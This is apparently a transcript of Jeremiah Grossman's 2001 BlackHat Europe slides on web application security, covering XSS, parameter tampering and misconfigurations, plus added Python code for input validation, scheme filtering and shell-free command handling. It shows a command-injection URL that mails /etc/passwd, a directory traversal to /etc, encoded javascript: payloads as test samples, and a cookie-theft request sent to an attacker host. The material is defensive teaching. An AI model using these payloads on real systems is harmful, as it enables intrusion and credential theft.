bh europe-01-grossman

Web Application Security "The Land that Information Security Forgot." BlackHat Europe 2001 Jeremiah Grossman [email protected] WhiteHat Security www.whitehatsec.com 2001(c)WhiteHat Security, Inc.


2. Topics
   Web Application Security Landscape
   Common Web Application Security Mistakes
   Web Application Attack Methodologies
     Information & Discovery
     Input Manipulation / Parameter Tampering
     Authentication / Authorization
     System Mis-Configurations

3. What is a Web Application?
   A web application or web service is a software application that is accessible using a web browser or HTTP(S) user agent.

4. LAYERS

5. What is Web Application Security?
   Simply, Web Application Security is... the securing of web applications.

6. FIREWALL

7. SSL

8. Common Web Application Security Mistakes

9. Trusting Client-Side Data
   DO NOT TRUST CLIENT-SIDE DATA!
   Identify all input parameters that trust client-side data.

10. Unescaped Special Characters
   ! @ $ % ^ & * ( ) -_ + ` ~| [ ] { } ; :" ? / , . > => >< =>&
   Null characters (%00) should all be removed.

12. More Mistakes
   Authentication mechanisms using technologies such as JavaScript or ActiveX.
   Lack of re-authenticating the user before issuing new passwords or performing critical tasks.
   Hosting of uncontrolled data on a protected domain.

13. Information & Discovery
   Spidering / Site Crawling
   Identifiable Characteristics
   Errors and Response Codes
   File / Application Enumeration
   Network Reconnaissance

14. Spidering / Site Crawling
   Site Map
   Hidden Services
   Service Map
   CGIs and Forms
   Documentation
   Email addresses
   Tools: WGET http://www.gnu.org/software/wget/wget.html

15. Identifiable Characteristics
   Comment Lines
   URL Extensions
   Meta Tags
   Cookies
   Client-Side scripting languages

16. Error and Response Codes
   HTTP Response Headers
   Error Messages
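Slides 9 and 10 say not to trust client-side data and to strip special characters and NUL bytes, but the deck shows no server-side code for it. The following is an added example, written for this page and not taken from the talk or from WhiteHat Security: a CGI-style parameter check in Python that decodes the query string (so %00 becomes a real NUL byte), removes NUL bytes, enforces a per-parameter allowlist instead of chasing the character list on slide 10, and recomputes an order total from a server-side catalogue rather than from a hidden price field (the hidden-form-field case is named on slide 36). The catalogue, the parameter names and the patterns are constructed for the example.

```python
import re
from urllib.parse import parse_qs

# Constructed catalogue: the server is the authority on prices (cents).
CATALOGUE = {"sku-100": 1999, "sku-200": 4999}

# Allowlist per parameter name. Anything that does not fully match is
# rejected, which covers every character on slide 10 without listing them.
PARAM_RULES = {
    "sku": re.compile(r"[a-z]{3}-[0-9]{3}"),
    "qty": re.compile(r"[1-9][0-9]{0,2}"),
    "email": re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"),
}


class BadInput(ValueError):
    """Raised for any client-supplied value that fails validation."""


def parse_form(query_string):
    """Decode a CGI query string; takes the first value of each parameter.
    Percent-escapes are decoded here, so %00 arrives as a NUL byte."""
    parsed = parse_qs(query_string, keep_blank_values=True)
    return {name: values[0] for name, values in parsed.items()}


def clean_param(name, raw):
    """Strip NUL bytes (slide 10: %00), then enforce the allowlist for `name`.
    Unknown parameter names are rejected too: a client cannot add fields."""
    if raw is None:
        raise BadInput(f"{name}: missing")
    value = raw.replace("\x00", "")
    rule = PARAM_RULES.get(name)
    if rule is None:
        raise BadInput(f"{name}: unknown parameter")
    if not rule.fullmatch(value):
        raise BadInput(f"{name}: rejected value")
    return value


def is_valid(name, raw):
    """Boolean wrapper around clean_param for callers that only need yes/no."""
    try:
        clean_param(name, raw)
        return True
    except BadInput:
        return False


def price_order_untrusted(form):
    """The mistake from slide 9/36: the total comes from a hidden 'price'
    field the client sent, so the client chooses what it pays."""
    return int(form["price"]) * int(form["qty"])


def price_order(form):
    """Server-side computation: only sku and qty are accepted from the client,
    and the price is looked up in the server's own catalogue."""
    sku = clean_param("sku", form.get("sku"))
    qty = int(clean_param("qty", form.get("qty")))
    if sku not in CATALOGUE:
        raise BadInput("sku: not in catalogue")
    return CATALOGUE[sku] * qty


if __name__ == "__main__":
    # Constructed request: a tampered hidden field plus a NUL byte in the SKU.
    form = parse_form("sku=sku-100%00&qty=2&price=1")
    print("untrusted total:", price_order_untrusted(form))   # client-chosen price
    print("server total:   ", price_order(form))             # catalogue price
    print("email ok?", is_valid("email", "user@example.org; sendmail /etc/passwd"))
```

The allowlist is deliberately per parameter: a regular expression that describes what a SKU or quantity may look like is easier to get right, and to review, than a blocklist of the characters on slide 10, and it also rejects characters the list forgot.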
17. File / Application Enumeration
   Commonly referred to as forced browsing or CGI scanning.
   Directory Browsing
   Index Listings
   Tools: Whisker http://www.wiretrip.net/rfp/p/doc.asp/i2/d21.htm

18. Network Reconnaissance
   WHOIS: ARIN http://www.arin.net/whois/index.html
   Port Scan: Nmap http://www.insecure.org/nmap/index.html
   Traceroute
   Ping Scan (Nmap or HPING) http://www.hping.org/
   NSLookup / Reverse DNS
   DNS Zone Transfer (DIG)

19. Input Manipulation
   Parameter Tampering: "Twiddling Bits."
   Cross-Site Scripting
   Filter-Bypass Manipulation
   OS Commands
   Meta Characters
   Path / Directory Traversal
   Hidden Form Field Manipulation
   HTTP Headers

20. Cross-Site Scripting
   Bad name given to a dangerous security issue.
   Attack targets the user of the system rather than the system itself.
   Outside client-side languages executing within the user's web environment with the same level of privilege as the hosted site.

21. Client-Side Scripting Languages
   DHTML (HTML, XHTML, HTML x.0)
   JavaScript (1.x)
   Java (Applets)
   VBScript
   Flash
   ActiveX
   XML/XSL
   CSS

22. Accessing the DOM & Outside the DOM
   Document Object Model (DOM)
   Client-side languages possess an enormous amount of power to access and manipulate the DOM within a browser.
   Complex and diverse interconnections create an increased level of access within the DOM.
   Increased level of access to read and modify DOM data, ranging anything from background colors, to a file on your system, and beyond to executing system calls.

23. CSS Danger: The Remote Launch Pad.
   Successfully CSS a user via a protected domain.
   Utilizing a client-side utility (JavaScript, ActiveX, VBScript, etc.), exploit a browser hole to download a trojan/virus.
   User is unknowingly infected/compromised within a single HTTP page load.

24. Dangerous HTML
   It's all bad.
   Solution: replace all "script" tags.
28. SRCing JavaScript Protocol
   Description: The JavaScript protocol will execute the expression entered after the colon. Netscape tested.
   Exploit:
   Solution: Replace "javascript" strings in all SRC & HREF attributes in HTML tags with another string.
   Exp: will render this script useless.
   Further Information: Any HTML tag with a SRC attribute will execute this script on page load or on link activation.
   As a further protocol pattern matching, the keywords "livescript" and "mocha" must also be replaced, for they hold the same possibilities.
   *** Netscape code names ***

29. SRCing JavaScript Protocol w/ HTML Entities
   Description: As another derivative of the previous, decimal HTML entities within these strings can cause filter bypass.
   Exploit:
   Replacement of entities 10 - 11 - 12 - 13 will also succeed.
   Hex instead of decimal HTML entities will also bypass input filters and execute.
   As well as placing multiple ZEROs in front.
   Solution: Filter these entities within the string, then do your further pattern matching.

30. AND CURLY
   Description: Obscure Netscape JavaScript execution line. Exact syntax is needed to execute.
   Exploit:
   Solution: or something similar will nullify the problem.

31. Style Tag Conversion
   Description: Turn a style tag into a JavaScript expression.
   Exploit:
   Solution: Replace the "javascript" string with "java_script" and all should be fine.
   Exploit: Import dangerous CSS.
   Solution: Filter and replace the "@import".
   Exploit: Import a JavaScript expression through a style tag.
   Solution: Again, filter and replace the "@import" and the "javascript:" just to be safe.

32. Twiddling Bits
   OS Commands
   Meta Characters
   Path / Directory Traversal

33. Power of the Semi-Colon: piping input to the command line.
   OS Commands
   Normal:  http://foo.com/[email protected]
   Altered: http://foo.com/[email protected];+sendmail+/etc/passwd
   Shell pipes and re-directs can also be used.
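Slides 24 and 28 to 31 describe the javascript: scheme (and the Netscape code names livescript: and mocha:) in SRC and HREF attributes and in style content, and the entity-encoding tricks that slip past a plain string match: decimal and hex character references, leading zeros, and entities 10 to 13 inserted into the keyword. The following is an added example in Python, written for this page and not from the talk or from WhiteHat Security. It applies slide 29's advice in the right order: first reduce the attribute value to what the browser will actually interpret (decode the character references, drop the control characters, lowercase), then match. The allowlist of schemes in ALLOWED_SCHEMES is an assumed policy that goes beyond the deck; neutralize() is the deck's own fix (replace the keyword, e.g. "java_script") applied to the canonical form so encoding cannot hide the keyword from it. CSS escape sequences inside a real style sheet are not handled here; only HTML character references are.

```python
import html
import re

# Script-executing schemes named on slides 28-29.
SCRIPT_SCHEMES = {"javascript", "livescript", "mocha"}
# Assumed policy (not from the slides): only these schemes may appear in SRC/HREF.
ALLOWED_SCHEMES = {"http", "https", "ftp", "mailto"}

# Control characters a browser ignores inside a URL (entities 10-13 among them).
_CONTROL = re.compile(r"[\x00-\x20\x7f]")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):")
# The deck's keyword rewrite, extended to the two Netscape code names.
_REWRITE = {"javascript": "java_script", "livescript": "live_script", "mocha": "mo_cha"}


def canonicalize(value: str) -> str:
    """Reduce an attribute value to what the browser interprets: decode
    decimal and hex character references (with or without leading zeros or a
    trailing ';'), remove control characters, lowercase."""
    decoded = html.unescape(value)
    return _CONTROL.sub("", decoded).lower()


def scheme_of(value: str):
    """Return the URL scheme of the canonical form, or None for relative URLs."""
    match = _SCHEME.match(canonicalize(value))
    return match.group(1) if match else None


def is_safe_href(value: str) -> bool:
    """Allowlist check for SRC/HREF values; relative URLs pass."""
    scheme = scheme_of(value)
    return scheme is None or scheme in ALLOWED_SCHEMES


def neutralize(value: str) -> str:
    """The slides' approach (28/31): rewrite the keyword so it no longer parses
    as a scheme. Done on the canonical form so entities cannot hide it."""
    canon = canonicalize(value)
    for keyword, replacement in _REWRITE.items():
        canon = canon.replace(keyword, replacement)
    return canon


def is_safe_style(value: str) -> bool:
    """Slide 31: reject @import and script schemes inside style content.
    Canonicalizing first also collapses inserted whitespace such as '@ import'."""
    canon = canonicalize(value)
    if "@import" in canon:
        return False
    return not any(scheme + ":" in canon for scheme in SCRIPT_SCHEMES)


if __name__ == "__main__":
    # Constructed samples covering the bypasses listed on slide 29.
    samples = [
        "javascript:alert(1)",
        "&#106;avascript:alert(1)",        # decimal entity
        "&#x6A;avascript:alert(1)",        # hex entity
        "&#0000106;avascript:alert(1)",    # leading zeros
        "java&#10;script:alert(1)",        # entity 10 (LF) inside the keyword
        "mocha:alert(1)",
        "http://www.whitehatsec.com/",
        "/images/logo.gif",
    ]
    for sample in samples:
        print(f"{sample!r:40} scheme={scheme_of(sample)!r:14} "
              f"safe={is_safe_href(sample)} neutralized={neutralize(sample)!r}")
    print(is_safe_style("background: url(javascript:alert(1))"))
    print(is_safe_style("@ import url(http://example.org/x.css);"))
```

The order matters more than the pattern: a filter that matches "javascript" before decoding is the one slide 29 shows being bypassed, and an allowlist of schemes is what removes the need to keep the keyword list complete.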
34. Power of the Semi-Colon: piping input to the command line.
   Meta Characters
   Normal:  http://foo.com/app.cgi?list=file.txt
   Altered: http://foo.com/app.cgi?list=*

35. Power of the Semi-Colon: piping input to the command line.
   Path / Directory Traversal
   Normal:  http://foo.com/app.cgi?directory=/path/to/data
   Altered: http://foo.com/app.cgi?directory=path/to/data../../../../../../etc

36. More Bits
   Hidden Form Field Manipulation
   HTTP Headers

37. Authentication/Authorization: Hand in the cookie jar.
   Cookies are restricted to domains (.acme.com).
   Uncontrolled data on a restricted domain can access the cookie data.
   JavaScript expression: "document.cookie"
   window.open
   document.img.src
   Hidden Form Submit
   www.attacker.com/cgi-bin/cookie_thieft.pl?COOKIEDATA
   Cookie data is passed to a CGI through a GET request to an off-domain host.

38. System Mis-Configurations: "patches, patches, and more patches"
   Vendor Patches
   Default Accounts
   Check:
     Web server permissions by directory browsing
     Software version from Discovery
     Known default accounts in commercial platforms (BugTraq)
     Anonymous FTP open on Web Server

39. Introducing OWASP: Open Web Application Security Project http://www.owasp.org
   The "Open Web Application Security Project" or OWASP is a community effort focused on defining Recommendations, Specifications and Methodologies for Designing, Developing, Deploying and Testing the security of web-enabled applications or web services.
   The "Open Web Application Security Project" or OWASP is based on an idea from the participants of the www-mobile-code mailing list at securityfocus.com.
   You can join the mailing list by visiting www.securityfocus.com.

40. Thank You. Questions?
   Jeremiah [email protected]
   WhiteHat Security www.whitehatsec.com
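Slides 33 to 35 show a CGI that hands a parameter to a shell, so a semicolon appends a second command, a bare "*" is expanded by the shell, and "../" walks out of the intended directory. The following is an added example in Python, written for this page and not from the talk or from WhiteHat Security, of the hardened equivalent: allowlist the value, resolve the path under a fixed base directory and reject anything that escapes it, and when an external program must be run, pass an argv list with no shell so ";", "|", ">" and "*" reach the program as literal text. DATA_ROOT, the patterns and the sample values are assumptions for the example; vulnerable_command() only returns the string the old CGI would have executed, to show the problem, and is never run.

```python
import os
import re
import subprocess

DATA_ROOT = "/srv/app/data"   # assumed base directory for the file parameter

# Allowlists: a bare file name with no separators, and an e-mail address that
# cannot start with '-' (so it can never be read as a program option).
_SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}")
_SAFE_EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def vulnerable_command(email):
    """Slide 33's mistake, shown only as the string a shell would receive:
    ';', '|' and '>' inside `email` become shell syntax. Never executed here."""
    return "sendmail " + email


def safe_path(base, user_path):
    """Slide 35: join user_path under base and normalise; return None if the
    result is outside base (absolute paths and '..' chains both fail)."""
    base = os.path.normpath(base)
    full = os.path.normpath(os.path.join(base, user_path))
    if os.path.commonpath([base, full]) != base:
        return None
    return full


def sendmail_argv(email):
    """Slide 33 hardened: validate, then build an argv list. With a list and
    shell=False nothing interprets ';' or pipes; the whole value is one argument."""
    if email.startswith("-") or not _SAFE_EMAIL.fullmatch(email):
        return None
    return ["sendmail", email]


def list_file_argv(filename, base=DATA_ROOT):
    """Slide 34 hardened: '*' and separators fail the allowlist, and the
    resolved path must stay under base. Returned argv is shell-free."""
    if not _SAFE_NAME.fullmatch(filename):
        return None
    path = safe_path(base, filename)
    if path is None:
        return None
    return ["cat", "--", path]


def read_data_file(filename, base=DATA_ROOT):
    """Preferred form: no subprocess at all, open the validated path directly."""
    if not _SAFE_NAME.fullmatch(filename):
        return None
    path = safe_path(base, filename)
    if path is None:
        return None
    with open(path, "rb") as fh:
        return fh.read()


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as base:
        with open(os.path.join(base, "file.txt"), "w") as fh:
            fh.write("hello\n")
        print(read_data_file("file.txt", base=base))
        print(read_data_file("*", base=base))
        print(safe_path(base, "path/to/data../../../../../../etc"))
        argv = list_file_argv("file.txt", base=base)
        # shell=False is the default; the list form never goes through a shell.
        result = subprocess.run(argv, capture_output=True, check=False)
        print(argv, result.returncode, result.stdout)
    print(vulnerable_command("user@example.org; sendmail /etc/passwd"))
    print(sendmail_argv("user@example.org; sendmail /etc/passwd"))
```

Two independent checks are applied on purpose: the allowlist rejects metacharacters before any path logic runs, and the commonpath test catches traversal even if a later change relaxes the name pattern. Replacing the external command with a library call, as read_data_file() does, removes the shell from the picture entirely.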